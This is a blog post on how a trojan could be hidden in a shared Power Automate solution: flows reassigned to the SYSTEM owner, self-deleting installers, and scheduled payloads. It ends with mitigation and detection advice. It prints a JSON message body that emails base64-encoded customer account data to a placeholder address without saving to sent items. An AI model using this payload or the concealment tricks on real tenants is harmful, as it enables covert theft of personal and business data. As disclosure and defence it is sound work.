Hacked by a Power Automate Trojan Virus

#powerplatform #powerautomate #hacked #lowcode

The Power in Power Automate is in its connections, they allow it to integrate with multiple systems, especially Microsoft systems. So it's plausible to see it become a hackers attack vector.

I've already made a couple of blogs on hacking using the Power Platform, but they have always been internal, relying on a bad actor within your organisation, but now I have found a way for external threats.

A couple of call outs, this is not a bug, but a fundamental way the platform is built, and secondly it does require access, so someone will need to import the software, and that needs to be done by someone with a elevated security role (a role with access to the data) and a premium license.

I'm also not going to show the code or share the solution, but there will be a demo video at the end of the blog.

The key to this exploit is Dataverse, it's the LowCode database of the Power Platform, storing potentially sensitive data, but also its the point of storage for the actual platform. Power Automate flows are stored as records in a Dataverse table, which means with one connection permission we are able to access data and manipulate the platform.

The hack is a Trojan, with the code running on a schedule sending out data.

There are 3 parts (flows):

The Spike
The Control
The Payload

1. The Spike

The spike is the installer of the trojan, in theory it would be included in a solution that someone downloads (a demo or tool shared by the community as an example). Within the solution it will need a Dataverse action (to mask the trojans need for it), and a connection to send out the data. If the dlp policy isn't managed a http action could be used. The easiest is the Outlook connector, but the best is the Office 365 Groups. Why the last one, well the v1 of the Office 365 Groups http action accidentally exposed the entire graph api (so it can call Outlook/SharePoint/OneDrive/O365 Users/Teams and more endpoints). It has been removed by Microsoft and replace with v2, but if you have the action you can still use it (and copy and paste to new solutions).

What it Does

First it copies the connection references used. These new references are now only visible hidden in the default solution.

Then it creates a new flow (with the new connection references), changes the owner, and turns it on. The scary part here is that we can change the owner to 'SYSTEM', which all components created by the platform are owned by. This means our flow will be very hard to locate, as it will not appear in your flows or within the original solution.

Now the Spike job is done it deletes itself. The new flow (the Control) is now totally separated from the original solution, so even if you delete it after you have finished with it the trojan will not be deleted.

2. The Control

The Control flow runs on a schedule (ideally out of business hours), its job is to create the Payload flow and that's it.

What it Does
Very similar to the Spike, it creates a new flow, changes owner to 'SYSTEM' and then turns it on.

A very simple flow and easy not to realise its impact

3. The Payload

The Payload flow could do almost anything, and is only limited to the connections created in the original Solution.

What it does

Example 1 - Steal Account Data
As Dataverse uses the Common Data Model we know about the standard table schema. A good table to target is the 'Accounts' table, as this has PI data like name, address, telephone number.

The flow grabs all of the data with a list rows
Sends Email using Office 365 Groups HTTP action
Deletes itself

The Office 365 Groups HTTP allows some extra functionality, the key being to not save to the sent folder (so you will never know your Outlook account was used).

{
  "message": {
    "subject": "sync",
    "body": {
      "contentType": "Text",
      "content": "test"
    },
    "toRecipients": [
      {
        "emailAddress": {
          "address": "yourRandomEmail@email.com"
        }
      }
    ],
"attachments": [
      {
        "@odata.type": "#microsoft.graph.fileAttachment",
        "name": "data.csv",
        "contentType": "text/plain",
        "contentBytes": "@{base64(body('Create_CSV_table'))}"
      }
    ]
  },
  "saveToSentItems": "false"
}

Example 2 - Turn off all flows as DLP violation
This requires an elevated security role (System Admin or System Customiser). You could delete all the flows instead, but a backup will normally be available, but if we just switched everything off and flagged as because of the DLP, that would cause more confusion.

Example 3 - Steal Emails
This one leverages the other connector required, Office 365 Groups or Outlook. It loops over the targets emails and sends them on to you.

And More
You are only limited by the connection and your imagination, but just few are:

Delete meetings
Send approval emails
Modify records like setting tasks to complete
Downloading OneDrive files
Downloading SharePoint files/lists
Reading Teams
Changing DLP
Deleting Environments

How To Fix

Call out here, this is not Microsoft fault, they have created a powerful platform that enables us developers to create amazing solutions. So its upto us to protect ourselves. First we need to treat Power Platform solutions like exe and VB files. Don't just download and run.

Is the source trusted?
What the flow does, what connectors does it use?
Don't turn any flows on until you have looked?
Be wary of Office 365 Groups connector
Never install in prod (including Default).
If you are an Environment Admin (or even worst Global Admin) don't install any solutions unless full code review
Use scanning software (like AutoReview)

Scanning software allows you to see the contents of the solution, connection references and what the flow does without having to import it:

Another one to be aware of is tracked properties, as it's a great way to hide values in flows.

actions('Sync_Value')?['TrackedProperties']?['table']

Also consider your strategy for CDM tables, as the scheme is public it might not be best place for sensitive data.

Checks

If you are worried this could have happened check your connections, as this will show which flows use it, if you spot an unusual flow investigate or just delete the connection.